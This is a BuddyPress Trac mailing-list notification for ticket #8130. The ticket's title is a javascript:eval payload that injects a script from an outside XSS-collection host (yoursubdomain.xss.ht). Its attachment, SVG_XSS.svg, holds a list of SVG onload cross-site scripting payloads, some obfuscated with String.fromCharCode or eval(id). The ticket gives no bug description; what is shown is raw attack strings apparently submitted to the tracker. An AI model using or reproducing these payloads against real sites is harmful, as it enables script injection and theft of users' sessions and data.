[buddypress-trac] [BuddyPress Trac] #8130: javascript:eval('var a=document.createElement(\'script\'); a.src=\'https://yoursubdomain.xss.ht\'; document.body.appendChild(a)')
buddypress-trac
noreply at wordpress.org
Sun Aug 18 23:56:34 UTC 2019
#8130: javascript:eval('var
a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
--------------------------+------------------------------
Reporter: zhacker13 | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: Core | Version:
Severity: normal | Resolution:
Keywords: |
--------------------------+------------------------------
Changes (by zhacker13):
* Attachment "SVG_XSS.svg" added.
<svg�onload=alert(1)> <svg/onload=alert('XSS')> <svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))> <svg id=alert(1)
onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
--
Ticket URL: <https://buddypress.trac.wordpress.org/ticket/8130>
BuddyPress Trac <http://buddypress.org/>
BuddyPress Trac
More information about the buddypress-trac
mailing list